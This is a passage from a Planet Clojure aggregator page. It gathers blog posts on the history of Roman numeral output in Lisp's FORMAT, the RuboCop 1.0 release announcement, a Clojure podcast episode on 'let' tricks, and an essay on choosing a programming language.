In “The Evolution of Lisp” [5], Richard Gabriel explains that in 1974 Guy Steele Jr. put roman numeral handling into MacLisp [6] as a hack. BASE and IBASE were variables which specified the output and input bases for numbers. Before his hack they were limited to values between 2 and 36. Steele added the ability for them to be set to ROMAN. Thus, if they were set, code like (+ i 1) would evaluate to ii, since the expression would have been read in as the equivalent of (+ 1 1), and on output the value 2 would be represented in roman numerals. (It seems from the original announcement of this ‘feature’ that you could also set BASE and IBASE to CUNEIFORM, which would cause your Lisp to become wedged. Oh so witty.)

From that time this feature became a bit of a traditional hack, being ported to ZetaLisp [7] as part of FORMAT.

Thus, when Common Lisp was being created, this feature was included in FORMAT [8], as it was a normal feature of that function in the Lisps that Common Lisp was being aggregated from.

Since then this feature has also found its way into Clojure [9] as part of its cl-format [10] function.


  1. https://exercism.io/my/tracks 

  2. https://exercism.io/my/tracks/common-lisp 

  3. https://en.wikipedia.org/wiki/Common_Lisp 

  4. https://webstore.ansi.org/Standards/INCITS/INCITS2261994S2008 

  5. https://www.dreamsongs.com/Files/HOPL2-Uncut.pdf p80 

  6. https://en.wikipedia.org/wiki/Maclisp 

  7. https://en.wikipedia.org/wiki/Lisp_Machine_Lisp 

  8. http://l1sp.org/cl/format 

  9. https://clojure.org 

  10. https://clojuredocs.org/clojure.pprint/cl-format 

Permalink

RuboCop 1.0

If at first you don’t succeed, call it version 1.0.

RuboCop’s development started exactly eight and a half years ago; I made the first commit on April 21, 2012. That’s a lot of time in general, but even more so in the fast-moving world of IT. During this long period we’ve racked up some impressive numbers:

  • 9905 commits
  • 152 releases
  • around 3500 closed issues
  • almost 5000 merged pull requests
  • over 120 million downloads
  • over 200 publicly available related gems (extensions, custom configurations, etc)
  • over 700 contributors

I never expected any of this on April 21, 2012. If there’s a person truly surprised by the success of RuboCop that’d be me. But wait, there’s more! We also reached some important milestones in the last couple of years:

  • Created the RuboCop HQ organization that became the home for RuboCop, the community style guides, and many popular RuboCop extensions
  • Extracted the Rails cops to a separate gem (rubocop-rails)
  • Extracted the performance cops to a separate gem (rubocop-performance)
  • Extracted the AST-related functionality to a separate gem (rubocop-ast)
  • Created new extensions focused on Rake (rubocop-rake) and Minitest (rubocop-minitest)
  • Made significant improvements to RuboCop’s code formatting capabilities
  • Reworked the cop API
  • Switched to safe-only cops by default
  • Introduced the notion of “pending” cops
  • Created a brand new documentation site
  • Provided more polished versions of the community style guides over at https://rubystyle.guide

One thing eluded us, though: a “stable” RuboCop release. Today this finally changes with RuboCop 1.0! [1]

There’s nothing ground-breaking about the new RuboCop release; it’s almost the same as the RuboCop 0.93.1 that preceded it. I believe the only change that most of you are going to notice is that all cops that used to be “pending” are now enabled by default, which is in line with our release policy. No new cops will be enabled by default until RuboCop 2.0.

The big news for end users and maintainers of extensions is that we’re finally fully embracing Semantic Versioning, which should make the upgrade process simpler (painless?) for everyone. Going forward, the following things will happen only on major releases:

  • enabling of new cops
  • changes to the default cop configuration
  • breaking API changes

It’s really funny that I felt for at least a couple of years that we were very close to the 1.0 release, only to keep coming up with more and more things I wanted to include in it. I believe I first spoke about my intention to ship RuboCop 1.0 at RubyKaigi 2018, and back then I truly believed it was bound to happen within the next 6 months. A classic example of planning in the software development world, right?

Many people urged me for years to label a random release as 1.0, with the argument that if some software is useful and widely used then it probably deserves that magic moniker. It’s not a bad argument and I totally understood the perspective of those people. I, however, was not convinced, as for me version 1.0 also stands for “we got to a place we consider feature complete and aligned with our vision”. Needless to say, the vision we (RuboCop’s team) had was quite ambitious and it took us a while to make it a reality.

I cannot begin to explain how happy I am that we got here, and I can assure you that it wasn’t easy. Over the years RuboCop has had its ups and downs; it got a lot of praise, but also a lot of flak. [2] Some days I was super pumped and motivated to work on it; on other days I couldn’t stand to think about it. Working on popular OSS projects is one of the most rewarding and most frustrating experiences that one can have. I was (un)fortunate enough to be involved in a few of those (RuboCop, CIDER, nREPL, Projectile, Emacs Prelude, etc.) and each one was a crazy roller-coaster ride.

I find it funny how my role in RuboCop has evolved with time. Originally I used to write mostly code; these days I write mostly tickets, issue/code review comments and documentation. Often I feel more like a project manager than a programmer. There was a time when I was super happy to see a PR and I’d immediately respond to it; now I can’t keep up with all the PRs. In fact, our entire team can’t keep up with them, so consider this my apology that it sometimes takes a while to get feedback on your suggestions. I’ll even admit that I rarely read issue tickets these days, as there are so many of them and it’s impossible for me to respond to all of them. I’ve just learned that important tickets always get noticed, if not by me then by someone else from our fantastic team.

I want to extend special thanks to RuboCop’s core team, as we would have never gotten so far without all those amazing people working tirelessly on the project:

You rock, guys!

Jonas, in particular, deserves just as much credit for RuboCop existing today as me. He was the first contributor to RuboCop and he pushed me to get RuboCop to the state where it got critical mass, mindshare and some traction. It’s a long story for another day and another article. [3]

Koichi also deserves a special mention for his tireless work and incredible dedication to RuboCop and its users over the years! And for his great karaoke skills! He has also been a fantastic head maintainer for key RuboCop extensions like rubocop-rails, rubocop-performance and rubocop-minitest.

Last, but not least - another round of big thanks for all the people who contributed to RuboCop in any capacity over the years! RuboCop is all of you! Keep those contributions coming!

Some closing notes:

• As mentioned above, recently we’ve extracted RuboCop’s AST-related logic to the rubocop-ast gem, which is going to be very handy for anyone looking to supercharge parser’s API. I’d love to see more tools using it, as I think we really managed to simplify the interaction with an AST. Work on the new gem is led by the awesome Marc-André Lafortune. By the way, he released rubocop-ast 1.0 today! We have some cause for double celebration!
  • The cop API was completely reworked recently by Marc-André. He did some truly fantastic work there! Check out the upgrade notes if you maintain any RuboCop extensions, as the legacy API will be removed in RuboCop 2.0.
  • We’ve made some changes to how department names are calculated that might affect some extensions. Read more about them here.
  • Check out the release notes for all the details.
  • rubocop-rspec is currently not compatible with RuboCop 1.0, but we’re working on this. You can follow the progress on that front here.

And that’s a wrap!

I feel a bit sorry for disappointing everyone who hoped we’d make it to RuboCop 0.99 before cutting RuboCop 1.0. We did our best and we had a great 0.x run, but we ran out of things to do. [4] :-) On the bright side, now I can finally say that I’ve got 99 problems (and 200 open issues), but cutting RuboCop 1.0 ain’t one.

Enjoy RuboCop 1.0 and share with us your feedback about it! Our focus now shifts to RuboCop 1.1, and I hope that we’ll be dropping new major releases rather infrequently going forward (although RuboCop 2.0 will probably arrive in less than 7 years). Thanks for your help, love, feedback and support! Keep hacking!

P.S. Koichi recently covered in great details our long journey to RuboCop 1.0 in his presentation Road to RuboCop 1.0 at RubyKaigi 2020. I cannot recommend it highly enough to those of you who’d like to learn more about the technical aspects of RuboCop 1.0 and all the challenges we had to solve along the way!

  1. Also known as the one that will bring balance to the (Ruby) Source. 

  2. In a recent survey RuboCop made both the list of most loved and most hated gems. 

  3. And like any good story it does feature Emacs. 

  4. I’m just kidding. Our plans are as grand and spectacular as ever! 

Permalink

Ep 086: Let Tricks

Each week, we discuss a different topic about Clojure and functional programming.

If you have a question or topic you’d like us to discuss, tweet @clojuredesign, send an email to feedback@clojuredesign.club, or join the #clojuredesign-podcast channel on the Clojurians Slack.

This week, the topic is: “let.” Let us share some tricks to reduce nesting and make your code easier to understand.

Selected quotes:

  • “It’s really about avoiding nesting.”
  • “Functions grow as a function of their nesting.”
  • “I don’t want to start doing math on a nil!”
  • “It’s a clue that the value might not be there.”
  • “It’s like your prep space in the kitchen.”

Links:

Permalink

How to Pick a Language

Say you're about to build a new project. You're an expert in a few languages, and you have a sense of the ecosystem in general. How do you choose the language you build with? I wanted to share my decision framework with you.

Start with Constraints

Some requirements can eliminate entire categories of choices. Let’s use that to our advantage: start by narrowing down your choices. For example:

Do you need extreme efficiency? This would mean your code may need to be compiled and that you can’t have run-time garbage collection. Well, that narrows down your choices quite a bit.

Do you need math-level proofs that your code works as expected? This would mean you need an extremely strong type system. Bam, that narrows the choices down quite a bit.

Do you need concurrency? There are only a few VMs and a few languages that are known to be excellent for concurrency. Depending on what you need, this will narrow your choices down to a few families.

Do you work in a larger environment? If you are building something, and your entire company is on one stack, there’s so much power to the existing ecosystem that this effectively narrows down your choice to the language of your environment. [1]

Is your problem in a domain where the ecosystem in one language is strongest? If you’re in machine learning, the ecosystem in python is so powerful that it almost guarantees to narrow down your choice to that language.

Is your problem a small script that needs to run everywhere? This narrows your choices down to the languages that are available by default on Linux.

Now, there’s a leverage point here: constraints narrow down your choices in a significant way. If you add a constraint you didn’t need, you risk sacrificing a large set of options. For example, many think their system needs to scale from the get-go. This is rarely the case and kills some of the choices that contributed to the success of the biggest companies today. [2]

So pick your constraints carefully. Once you do though, you’ll be pleasantly surprised with how much clarity they give you: your choices will have gone through a significant filter.

Optimize for Effectiveness

The next filter is effectiveness. Choose the language that maximizes your output on a time scale you care about.

At this stage, there is often a tradeoff between what you’re comfortable with and what you need to discover. Say you’re comfortable in assembly, but don’t know any other languages. What should you do?

Well, for some very small problems, it does make sense to just write them in assembly. If they’re urgent, you have no other choice. But for any significant work, you’ll outstrip the productivity of assembly within a few days of ramp-up.

The same kind of spectrum exists in higher-level languages, but the differences take longer to show up. If you’re comfortable with Java, for example, you can get a lot done pretty quickly. But within some period, the productivity benefits pale in comparison to more powerful languages.

Making this choice is a bit of an art, but it works like this. You want to think about a time-frame that you’d like to optimize and pick the language that optimizes for effectiveness within that timeframe.

If you’re in a hurry, you have no choice but to use what you’re comfortable with, no matter how limiting. There are two ways to avoid the dilemma. You can either play with different languages before you start your project, so you have a wider array of comfortable choices to pick from, or give yourself a few months to ramp up and select the language that’s most effective for your problem.

With that, the question comes, what time frame should you optimize for? This is in itself an art. For startups, I would say about 8-12 months. Planning further than that is over-optimization. For larger companies, I’d think 2-5 years.

Break Ties with Fun

Now you’ve gone through two filters. Say you narrowed down to just a few choices, but you aren’t sure which one to take. How should you break the tie?

I’d say fun. There are so many schleps in a startup that programming should be as fun as possible. Once I’ve narrowed down, I’d choose the language I’m most excited about.


Thanks to Sean Grove, Daniel Woelfel, Joe Averbukh, and Alex Reichert for reviewing drafts of this essay.

  1. Greg Brockman made great points in his talk on Stripe culture. Choosing to work in the same language as the rest of the company magnifies the impact of each engineer. 

  2. Most successful large companies founded around 2010 used either Ruby or Python. Both would have been struck off the list if you had optimized for scale prematurely. That's not to say you should use them, though. They were popular because of how expressive and powerful they were. Some languages are just as expressive, if not more so (think Elixir, Clojure), and also happen to be excellent for concurrency. 

Permalink

Copyright © 2009, Planet Clojure. No rights reserved.
Planet Clojure is maintained by Baishampayan Ghose.
Clojure and the Clojure logo are Copyright © 2008-2009, Rich Hickey.
Theme by Brajeshwar.